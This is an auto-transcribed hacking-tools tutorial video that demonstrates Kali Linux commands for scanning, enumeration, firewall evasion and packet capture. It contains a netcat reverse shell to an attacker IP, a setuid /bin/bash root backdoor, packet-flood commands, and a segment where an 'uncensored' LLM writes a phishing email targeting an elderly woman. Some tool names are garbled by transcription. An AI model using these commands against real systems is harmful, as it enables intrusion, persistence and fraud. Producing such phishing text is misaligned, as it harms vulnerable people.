60 Hacking Commands You NEED to Know

00:00

Here are the top 60 hacking commands you need to know.

00:02

I also brought in a few experts,

00:04

so get your coffee ready if you want to try these commands right now.

00:07

I've got a free Cali Lennic Sandbox and a description.

00:10

Just click that link and right here in your browser, boom hacking environment.

00:14

Make sure you read the instructions. You get two hosts to hack with. Also,

00:17

all the commands in this video are in the description below.

00:19

We even created this beautiful top hacking commands cheat sheet.

00:22

You got to have this the humble ping command.

00:24

We ping a host to see if it's up and if it's up we'll hack it.

00:27

But right now we're sending a 64 byte packet. What do you say?

00:29

We send something bigger to test firewall capabilities.

00:32

We can type in dash S and specify the size of our packet,

00:36

testing the capabilities of a firewall, or we can get even crazier.

00:39

We'll still send our large packet dash S 1300,

00:42

but then we'll use the switch dash F to absolutely obliterate this host flood.

00:47

A ton of packets. And actually before we do that, I want to see this happen.

00:50

I'll start another terminal and give you a bonus command here.

00:53

This tool is called IF top.

00:55

I'll install it with a PT install if and then type in if F top to run it.

01:00

Now let's flood. Look at that.

01:03

That's a lot of data control C to stop that. Same for if F top. Goodbye.

01:08

And actually let's keep IF top up because we're not done with ping yet.

01:10

I know you didn't realize there's so much to ping and this tool is kind of

01:13

crazy. It's called H ping three.

01:15

We'll install it with a PT install H ping three.

01:18

And we can do fun things like flooding packets on a specific port. For example,

01:21

port 83 s for a T CCP packet V

01:26

for verbose mode gives us more flood to make it rain. And finally the host.

01:31

Here we go man, look at that. And we're hitting port 80.

01:36

Great for testing web servers.

01:37

We can also use H ping three for a fancy trace three

01:42

V and then here's what's cool.

01:44

We'll do dash one four I CM P packets and then our host network chuck.coffee,

01:48

but sometimes firewalls P with trace route removing dash one.

01:52

We can instead do P 80 and S doing trace route on port

01:56

80,

01:57

which is web traffic using of course CP and pick your port

02:02

maybe 4, 4, 3, maybe 53.

02:04

Use the DS port specifying UDP traffic or with TCP traffic we

02:09

can add the dash a switch setting the act flag and then change our base

02:14

port with dash dash base port 1, 3, 3, 7.

02:19

All amazing options to help us evade firewall rules.

02:21

Now I bet you thought we were done with ping, but we're not.

02:23

You can tunnel TCP packets over ICMP echo reply and request packets.

02:28

What? Check this out. It happens with the tool called P tunnel.

02:31

A PT installed P tunnel. On the target side, we'll simply run P tunnel.

02:37

On the attacker side we'll run P tunnel P for proxy address,

02:41

it'll be our target dash LP. To specify our local port,

02:44

we'll do 8,000 dash DA for our destination address.

02:48

It'll also be our target and we'll do dash DP for our destination port.

02:51

And because I'm going to try SSH, I'll do port 22 ready set tunnel.

02:56

Now to watch this happen in real time, I'm going to show you a new command.

02:59

CP dump will help us to capture and visualize these packets in real time.

03:02

We'll use a PT install TCP dump to install it and then we'll run T CCP dump

03:07

dash I for interface and we'll say any. And we're only looking for ICMP traffic,

03:11

so we'll type in ICMP. Now watch this. I'll want you new terminal.

03:15

Now I'm going to go over this tunnel using ICMP packets. Oh my gosh,

03:19

check this out.

03:20

SSH P report specifying 8,000 and I'll do username network.

03:25

Chuck,

03:25

that's my username at the other host at local host pointing it right here on

03:30

this computer, this server. Ready, set, go. Do you see it happening?

03:34

Oh my stinking, gosh. Literally sending SSA traffic over ICMP.

03:38

Echo reply echo request. That's magic. Who am I IP address? Yep,

03:43

I'm somewhere else. That's so cool.

03:44

And control C to close those tunnels on both sides,

03:47

this is great for evading firewalls that might block that type of traffic.

03:50

Here's a quick command from Tom, nom, nom, nom nom. No, no.

03:54

I'm Tom m nom and this is a trick I use all the time.

03:56

If you're running a command and you don't know what you want to do with the

03:58

output yet, pipe it to vim dash. That'll open the output of the command in Vim,

04:03

and then you can either manually edit it or you can use column percent bang to

04:07

run it back through any command you want. Run it through,

04:09

sort to put things in order or grip dash V to remove lines you don't want.

04:13

And then as a bonus, if you have a file name under your cursor at G,

04:16

then F to open that file in a new buffer.

04:19

Nmap will scan a network helping us to discover hosts that we can hack.

04:22

Here's some fun ways to use it. First,

04:23

make sure you install it A PT install Nmap.

04:26

We can scan an entire network for quick mapping with Nmap dash, sn,

04:30

and then our target network. Hey, it found 11, host the switch, lowercase s,

04:34

capital V will do service discovery on a target works like a charm.

04:39

Use the capital O switch for OS detection. Well hold up, we tried,

04:43

but it's blocking ping probes. Let's try dash PN to not do the probe.

04:47

We'll add that to our command dash capital P lowercase n bam.

04:51

We got it's a Windows pc.

04:53

We can use a lowercase s capital L switch to do quick host name scanning on a

04:57

network. Nmap scripts, unlike a whole new world,

04:59

we can scan for vulnerabilities on a host with script vol and then our target

05:03

host or network, we can use the malware script to scan for known malware.

05:07

With the capital A switch, we can scan for pretty much everything.

05:10

Take a little coffee break, it'll take a while.

05:15

This one switch does OS detection, version detection,

05:18

some default script scanning from Nmap and the trace route.

05:21

That's a lot of info. That's awesome. If we use the lowercase F switch,

05:25

it'll fragment our packets and make it harder for us to be detected while we're

05:27

scanning. We can also avoid detection by changing our source port.

05:30

Using these source port switch, we can just say, Hey, I'm DNS, don't mind me.

05:35

And if you really want to be tricky with Nmap, you can scan with decoys,

05:38

check this out,

05:40

Nmap dash capital D for decoys and then specify r and d all

05:44

capital. Let's say 10. What that will do is generate 10 random IP addresses,

05:49

random decoys that you're scanning from so they can't find you.

05:52

We'll put our host in and then bam scanning from 10 different IP addresses.

05:55

Now Inmap is cool,

05:56

but what you have a lot to scan like networks upon networks and you want to scan

05:59

them fast, that's where mass scan comes in.

06:02

One install mass scan with a PT install mass scan.

06:06

Mass scan is similar to Nmap and that we can specify ports to scan for specify a

06:10

network,

06:11

but then we can specify our rate and go super fast just

06:15

like that. Or if we have no idea what networks we're dealing with,

06:18

we can scan everything by the entire 10 point subnet range and we'll do a rate

06:22

of 10,000. Now it is fast,

06:24

but you still might want to take a coffee break just saying

06:28

we'll just control see that.

06:29

We could also use the randomized host switch to change the order in which we

06:33

scan our host or networks helping us stay a bit more hidden or we can quickly

06:36

find servers foolishly running telenet on a network. Super insecure,

06:40

but we can find that out right now simply by specifying port 23 and scanning an

06:44

entire network fast. Got one.

06:46

Now here's John Hanman with something a bit silly but I love it though.

06:49

You normally just enter LS on the command line to list stuff in the current

06:54

directory. Well, did you know that there is actually an S SL command?

06:59

Like if you were typing really fast or you accidentally made a mistake or you

07:03

had a typo when you meant to type LS and you accidentally typed S

07:08

sl,

07:08

this is the steam locomotive and it is a train that

07:13

is displayed on your computer screen, on the command line on the terminal.

07:17

And look, you can't get out of this, you can't type anything,

07:21

you can't do anything. You just have to wait for the whole train to drive by.

07:26

Now the next fun hacking command that I want to show you is actually part of the

07:31

dev piece of the file system. I don't know if you're familiar,

07:34

but there is a slash dev slash udom file and that is

07:39

like a device to list out PSEUDORANDOM data just coming from your

07:44

computer, right? Hey, you have a stream,

07:46

a constant stream of randomness and this looks hysterical.

07:50

It is just gibberish nonsense zeros and ones and all the

07:55

data up to 255 askie characters printable non-print.

08:00

And it just looks like absolute chaos. You can control see out of this,

08:05

but sometimes it might break the terminal and you can't actually continue to

08:09

interact with the shell.

08:10

So it's something that you might be able to do as a troll, as a meme, right?

08:14

So what if we actually set an alias for that same LS command?

08:19

Maybe we could set that to a cell if we wanted to run the steam locomotive train

08:22

again,

08:23

but we could set that to Cat deran and now anytime

08:28

someone were to actually enter LS on the command line thinking that they're

08:32

going to list files,

08:33

it'll just spit up and go crazy with all that random gibberish nonsense.

08:38

I think that's kind of fun.

08:40

By the way,

08:40

John Ham who will show us a real hacking command he loves later in the video,

08:44

the who is command will tell you a ton of stuff about a domain,

08:47

install it with a PT install, who is microsoft.com,

08:51

fax number, phone number, address,

08:53

let's try cia.gov redacted should have expected that.

08:58

What web will tell you what technologies a website is using a PT install what

09:03

web to install it and then we'll type in what web and our domain.

09:07

We'll try network chuck.coffee.

09:09

And while that's scanning perfect time for a coffee break,

09:13

it gives you a ton of information including the fact that it's powered by

09:16

Shopify right there. Next up, curl from Naham sec.

09:19

My favorite command is actually not using any hacking tools and it's probably

09:23

one of the most basic commands used on Linux and it comes by default on almost

09:27

any operating system and that is a curl command.

09:29

And lemme show you real quickly how I use it.

09:32

The first thing I want to do is usually I just want to do a curl dash I that

09:35

usually gives you the headers and every response in that header of what it is

09:39

coming back from the server.

09:40

So in this case it's giving us a 3 0 2 and it's saying, Hey,

09:43

you are going to get redirected to this exact location.

09:46

And I like doing curl a lot because I'm hacking a lot of APIs most of the time

09:49

and with APIs I want to just quickly see if an endpoint is accessible or if I

09:53

can fit some sort of a data.

09:55

And a lot of times I'm processing data as a part of my hacking when recon.

09:58

So it makes it a lot easier to do it through Chrome.

10:00

And what you want to do for this one, for example, if you want to authenticate,

10:03

instead of launching your browser and setting this header manually,

10:06

all you have to do is you can pass a header and set that custom header with its

10:10

token in there and run it and it would authenticate you and give you whatever

10:14

data it is that you're looking for on that. API.

10:16

Hey, real quick, can I show you something crazy? Check this out.

10:19

I'm about to run an uncensored version of chat GPT or an LLM,

10:23

which means you can pretty much do whatever you want to do with it.

10:26

Now why am I doing this? Well,

10:27

because Bitdefender just came out with a tool called Scamo.

10:30

It's a free AI powered scam detector and prevention service from Bitdefender

10:34

like legit. Check this out. I got a text from a scam. I'm pretty sure it is,

10:38

but do I actually know? Lemme go find it. Oh yep. Here's one.

10:42

Pretty sure this is a scam,

10:43

but do I know all I got to do is copy that sucker and jump into Facebook

10:47

Messenger, just one of the places I can chat with and see if things are scams.

10:51

So let's try it out. Hey, is this a scam again, this is totally free,

10:55

I'm just chatting with it here in Facebook Messenger and within seconds it told

10:58

me that hey, it might be kind of suspicious. Don't do anything with it. Okay,

11:02

that's pretty cool. That didn't fool it,

11:03

but what if I had this uncensored AI tool try to produce a phishing message.

11:06

Can we trick it? Let's try it out.

11:07

I need you to write a very convincing phishing email for an elderly woman named

11:10

Deborah. The goal is to get her to give me some money,

11:12

use the best method and write it in a way that will avoid spam and fraud

11:16

detection. Lemme add that and fraud detection. Snap. Okay, that's pretty good.

11:20

It even added this at the end. That's awesome. Okay,

11:23

let's doctor it up just a little bit or remove the,

11:26

it's not a real URL thing right there.

11:28

Let's add a real looking number like 7 6 5 0 9 8 7

11:33

and I'll remove the not a real number thing here too. Okay, cool.

11:36

Our message is ready. Let's test it out. Please tell me if this email is okay.

11:40

Now, while it's checking that, think about this.

11:42

Who in your family or in your friend group could benefit from having something

11:45

like this?

11:46

I can't tell you how many times I'm getting a text from my grandma or my mom

11:49

going, Hey, is this a scam? Is this fraud?

11:51

But if they can chat with something that is honestly probably smarter than me

11:54

and will be up to date with the latest scams,

11:56

it's actually powered by a bitdefender,

11:58

the excellent security suite that I've talked about here on this channel a lot.

12:01

So all the information and knowledge they have is feeding the scamo free AI

12:05

powered tool. Okay, the results are in the email does seem suspicious,

12:09

it tells you what tactics it might be using and it tells you to contact your

12:12

bank directly. That's perfect.

12:14

That's what I would tell my grandma or my mom or my dad.

12:17

So seriously try it out right now. Check the link below, it's free,

12:19

you can chat with it here on the website or chat within Messenger.

12:22

They'll be adding WhatsApp soon and it'll check lots of things like you can send

12:25

out a QR code and go, Hey, is this good? You can send out pictures of stuff.

12:28

This is a crazy powerful and free tool. I love what Bitdefender is doing.

12:31

So again,

12:32

definitely check it out and thank you to Bitdefender for sponsoring this video

12:34

and making a really awesome free tool available to all of you guys.

12:37

Nick to is an open source web server scanner that'll scan websites for any

12:41

dangerous bad stuff. It might have to install it.

12:43

We'll do AP PT install Nick to and for a basic vulnerability scan.

12:47

We'll do Nick to dash H for our host and specify our host network.

12:52

Chuck dot copy go Buster can be used to find directory and files on a web

12:57

server.

12:57

We'll install it with a PT install Go Buster to enumerate network chuck.com.

13:02

We'll do go Buster, we'll type in DUR for directories.

13:05

That's the mode we're going to be in.

13:06

We'll type in U and specify our domain network check.com and we'll use the dash

13:10

W to specify our word list.

13:12

I'll use a default Cali Linux one here and go and it's discovering all my

13:16

directories files now because Go Buster is written and go is extremely fast.

13:20

Subdomain, enumeration, yeah, we can use it for that,

13:22

but first I want to download a word list to get a ton of word lists right now on

13:26

your system we'll use the tool called SEC list A PT install SEC

13:30

lists. Fair warning, this is pretty big. Lots of word lists.

13:34

Once it's done downloading,

13:36

you can find it in user share SEC list.

13:40

Lots of stuff in there. Now real quick, if you only want to download one thing,

13:44

the thing that we care about, there's a command for that.

13:46

It's called W Get Cyclist is also on GitHub and it's maintained by my friends.

13:50

What we care about is discovery and DNS and we'll get Jason Haddock's list here.

13:55

I'm going to grab the raw URL to install W get a PT install W Get

14:00

Kind Seeing a pattern here, right?

14:01

Type in W get paste at URLW. Got it. Now getting back to Go Buster,

14:06

we can enumerate domains. We'll type in go Buster mod BDNS.

14:10

We'll specify our domain with dash D network check.com and then our word list

14:14

with dash W. I'll use Jason Haddock's DNS. Ready, set, go.

14:18

Now that's a pretty big list and if I were doing a legit pin test,

14:21

I'd probably let this finish out but I don't have time for that.

14:23

I'm not patient enough Control C to stop that.

14:25

I want to show you another way to do subdomain enumeration.

14:27

This tool is called sub lister. You can install it with a PT,

14:30

install sub lister just like this and the E is a three.

14:33

And then to run sub lister,

14:34

we'll simply type in sub lister dash D to specify our domain network check.com

14:38

and let it go. And it found a lot of stuff. This next one is pretty fun.

14:43

It's called WP Scan.

14:44

It will scan WordPress sites and help you find all the issues that might be

14:48

affecting it. Great. If you're a WordPress site owner and great,

14:51

you're a pen tester, let's try it out. We can run it in a few ways.

14:54

The first way WP scan, we'll do dash dash URL and specify our URL.

14:58

We'll do chuck keith.com, my personal website that's not doing anything.

15:02

And then we'll do dash enumerates you,

15:05

not you the letter you the U stands for users, let's try it out.

15:09

That's a lot of information. We can also use the P option for plugins.

15:13

We can use T for themes or do something pretty aggressive.

15:17

We'll do VP VT dash plugins,

15:21

dash detection and we'll add aggressive at the end just to make sure we get our

15:25

point across. This is a super aggressive vulnerability scan. Let's try it out.

15:29

Now you may have noticed that all those commands did not output anything fun

15:33

because you need an API token from WP scan,

15:35

which you can get for free right now.

15:37

And then you would run the commands like this specifying your API token with a

15:41

dash API dash token switch. A mass is another tool you can use for subdomain.

15:45

Enumeration. Install it with a PT install and to run it we'll type in a mass,

15:50

type in enu dash adidas specifier domain network chuck.com and let it

15:55

go. This tool might run forever. Alright, I don't want to wait for it though.

15:59

Control C to stop that. But man,

16:01

look at all the stuff about to do a more passive enumeration.

16:04

You can do this a mass and we'll specify a dash passive

16:08

and then our domain, whereas the other one was a bit more active.

16:11

I like AMA because it does give us options based on what our scope is and we'll

16:15

go ahead and stop that. This next command opens up the door to new commands.

16:19

What does that mean? You'll see it's a tool called gi,

16:22

which we'll often use when you first start out to interact with GitHub.

16:25

Let me show you. There's a tool we're about to use called Search point,

16:28

but the way we use this tool is by downloading it from GitHub and actually I

16:32

lied, this is a GitLab repository, but it's pretty much the same thing.

16:37

You'll use GI all the time to install all kinds of stuff,

16:40

but first we have to install GI A PT Install Get you probably already

16:44

have it. And then probably my favorite command is GI Clone.

16:48

We're going to clone a tool onto our computer and in our case it will be search

16:53

point. Let's go to properly use that command, we'll add a symbolic link.

16:58

We're not going to talk about that, just know it's a command below.

17:01

And then finally we can use the command search exploit, right? Yeah,

17:03

it's going to work. Let's try searching for WordPress plugins.

17:08

It'll search for exploits that involve WordPress plugins. What about SSH?

17:12

A ton of exploits pertaining to SSH Super handy tool if you want to update the

17:16

database search exploit dash u crazy powerful tool.

17:20

Now here's John Hammond with a real hacking command. It's kind of awesome. Let.

17:23

Me get into the real genuine ethical hacking and penetration testing.

17:27

My favorite top hacking command. Here's the thing,

17:31

when you're on the command line interacting with the shell,

17:34

you're actually running this program called Bash or the born again shell.

17:38

Now that lives on the file system and slash bin bash.

17:43

So if I were to actually execute this, it doesn't look like it does anything,

17:47

I just get the prompt back because I've just invoked and I'm running a shell or

17:52

terminal inside my shell so I could exit out of that and get back to my

17:56

original prompt.

17:57

But Ben Bash actually takes a special argument called TAC P

18:03

and that will enforce and maintain set UID permissions,

18:07

which means that the owner of the file root,

18:11

in this case the admin absolute controller of the computer will be able to keep

18:15

their permissions but it has to be a set UID binary.

18:19

So the way that we could do that is to actually change mod or CH

18:23

modifications,

18:24

change modifications on the file and add or plus the

18:29

S letter for set UID.

18:31

We'll put that on Bin Bash and this will require some root

18:36

privileges.

18:37

That means that you need to be the admin to be able to configure this.

18:41

But what that ultimately does is create a back door or you have

18:46

a persistence mechanism,

18:47

a little bit of a foothold so that at any point if we configure this with our

18:51

pseudo password later on down the line,

18:54

you get access to this machine one more time.

18:57

Now you can just run bash tack P and you

19:01

are root, you control the whole machine because you are the admin user.

19:06

You set up that back door. If you wanted to,

19:09

you could move into the root directory and you could do anything that you want.

19:13

Maybe we could echo hello into a

19:18

please subscribe to network Chuck,

19:23

I'll hit enter on that. And now if I zoom out, let me show you this.

19:27

LS Tech LA we can see our file right there.

19:30

Please subscribe to network Chuck. Hey,

19:33

just owned and controlled by the root user and we were able to configure that

19:37

with our back door. Pseudo CH mod plus S bin Bash.

19:42

That is my favorite top hacking command because then you've got a

19:46

backdoor,

19:47

you've got a persistence mechanism and a way to become root at any point.

19:51

I hope you enjoyed a couple of those. Really neat Hey top hacking commands.

19:55

But thank you so much network Chuck for letting me join the party here.

19:58

This was an absolute blast.

20:00

Now I'm going to do something bad. I'm going to do the same command twice. What?

20:03

No, I know. It's okay. We're going to talk about TCP dump again. Why?

20:07

Well because there's more cool stuff about it and we didn't give it enough time.

20:09

We'll type in TCP dump, we'll type in dash W to send it to a file.

20:13

We'll just call it capture dot pcap.

20:15

Then dash I for our interface and we'll do ethernet zero.

20:18

That's the one I have now lemme just make sure that's the case. IP address, yes,

20:22

ethernet zero and go. And we'll generate some traffic,

20:25

do something fun that we've already learned and map with random addresses.

20:29

Decoys. We'll stop that with CTRL C.

20:32

We can analyze that traffic with this command.

20:34

TCP dump dash r specify our capture file which just capture pcap.

20:38

Let's take a look. Cool.

20:39

We can see we can also limit the amount of packets we capture with TCP dump and

20:43

the switch dash C for counts. And we'll say like 100 that did not long.

20:47

Now TCP dump is pretty cool.

20:49

Great for quick captures but the real tool you want to use that's crazy powerful

20:53

is thar the command line brother of Wireshark.

20:57

To install thar we'll do a PT install thar thar can do a lot.

21:01

Let's try a few things. First we'll type in thar and we'll capture one packet,

21:05

just one. We'll put it in verbose mode with dash capital V,

21:09

we'll do dash C for count. We'll do one and then dash IE,

21:12

the 9 0 1 packet captured. And then look at all the stuff it shows us.

21:15

That is so powerful. Networking geeks are just drooling. So yes, I'm drooling.

21:19

Do you want to see something crazier filters. Watch this T-shirt.

21:23

We'll do a dash y to apply a display filter and with this single quote we'll

21:27

specify we'll do http request method

21:32

space equals equals and a double quotes get and then close it out with a single

21:35

quote. I know it's kind of wordy but check this out. Let's specify our interface

21:40

get at zero and we're now capturing only showing get request. How cool is that?

21:45

Let's generate some curl academy.network chuck.com.

21:49

There's another one that's so cool.

21:52

Now one of the most powerful ways we can use thar is by analyzing packet

21:54

captures. So let's do a capture real quick to a file thar and actually no,

21:59

I'm going to show you one cool thing.

22:01

We'll use a command called timeout and put in 15 seconds and it'll time out or

22:05

stop this packet capture in 15 seconds. That's pretty cool.

22:08

Thar dash I ethernet zero and with a dash w command similar to

22:13

TCP dump. We'll send that to a file thar dash p app me.

22:17

Try to generate some quick traffic and done to display statistics and

22:21

specifically to follow endpoint connections.

22:23

Use this command thar dash r, we'll specify our capture,

22:27

which was thar pcap.

22:29

Then we'll use the switches dash qz and specify endpoints ip.

22:35

How cool is that?

22:37

We could also follow A TCP stream with thar dash RR capture dash qz and we'll

22:42

say follow comma TCP. And we'll put that in ask E.

22:46

So ask E, we'll do comma, we'll follow the seventh stream. That's pretty cool.

22:51

Let's try, I dunno, the first stream. First stream's crazy.

22:54

Let's do the 20th stream, the hundred stream. So powerful.

22:58

We can also simply do custom output of fields based on the capture we're

23:02

reviewing. Check this out thar do a dash e IP source dash e IP

23:07

desk or DST dash e framed protocols.

23:10

Notice we're specifying fields. We'll do a dash T fields,

23:14

which is telling it to only output the fields we're specifying.

23:16

And then finally dash r specifying our capture. How cool is that? So powerful.

23:22

This is my new favorite tool.

23:23

Tux a terminal multiplexer install tux with APT install tux.

23:28

And then simply type in tm.

23:30

We suddenly have a new terminal that we can do stuff in like ping

23:33

academy.network chuck.com, leave that there.

23:35

Hit control B and then D on your keyboard, you're detached from it.

23:39

And then with tux A get right back to it. How powerful is that?

23:44

I'll stop type in exit to close that out.

23:46

We can create multiple sessions and name them. So team UX,

23:49

new dash S and name it Bob, here's Bob. We'll ping something here.

23:55

Detach from that for another session, Susie.

23:59

Now if I type in tux ls,

24:00

I've got two sessions and I can reattach to either of them, team ux,

24:05

a dash t to specify my target will say Susie jumping right back in there.

24:10

I can hit control B and then W to quickly jump between my various team Uck

24:14

sessions and I can leave, go to another computer,

24:17

jump back in here and connect to any one of these sessions.

24:20

If you want to learn more, I did a whole video on team UX right up here. SSH.

24:23

We use it all the time to remote into our systems. So for example,

24:26

this Ubuntu guy to jump into him,

24:28

I'll use SSH Ss H network Chuck at his IP address

24:32

already. Cool. But it can do more. Instead of logging in,

24:35

I can actually just run a command via SS H on another system with SSH network.

24:40

Chuck at my server. And then right after that specify the command I want to run.

24:45

So in single quotes I can say, who am I?

24:48

BAM or IP address.

24:52

Crazy powerful. Let's get crazier. You can actually make it a SOX proxy. What?

24:56

Watch this. Before I create the tunnel,

24:58

lemme demonstrate my location right now what's my IP address? I'm in Dallas,

25:02

Texas as you can see right here. But if I use this crazy SSH command,

25:05

I'll create a proxy and tunnel myself somewhere else. SSH dash D,

25:09

which is telling it to create a SOX proxy. And I'll say port 1, 3, 3, 7.

25:13

We'll do a dash C for compression dash Q for quiet mode and dash N to not

25:17

execute any commands. And finally our server information root at,

25:20

and this will be a server in Japan. Put our password in.

25:25

Now we're going to launch chromium using that proxy. Our SOX five,

25:28

the local host. Ready, set, go. Chromium's launched.

25:31

Now I'll see where we are already feel a bit different and giving them,

25:34

having a hard time figuring out where to go. I'm definitely in Osaka, Japan.

25:38

Super cool, right Netcat our go-to for reverse shells. To install netcat,

25:42

we'll do a PT install netcat dash traditional.

25:47

To verify,

25:47

just type in NC dash H and with Netcat installed on both your attacking computer

25:52

and your target computer. Let's do a reverse shell on the attacker.

25:55

All we got to do is wait,

25:56

wait for the shell type in NC dash LVP and the port.

26:01

You're waiting on 1 3, 3 7. We're waiting because on a reverse shell,

26:05

the target reaches out to us On the target side, we'll type in NC for netcat,

26:09

we'll do a dash e and specify the shell we want to have access to.

26:12

So we'll do slash ben slash sh specify our attacker ip,

26:17

which is us and the port 1, 3, 3, 7 that the attacker is listening on and they

26:21

one hit enter if something happened. It sure stinking did check it out.

26:27

I'm on the other computer. I've got a reverse shell.

26:29

They can also do a fun thing where you just set a simple chat server with net

26:32

cap. Why? I don't know. But you can do it. You should try it. It's fun.

26:35

On one side you type in NC dash LVP, set up port on the other side,

26:40

type in NC dash V,

26:42

the IP address of the other computer and the port.

26:46

So now I can say hey and I get hey, on the other side,

26:50

what are you thinking about the end of this video?

26:55

Me too. I'll catch you guys next time. For real though.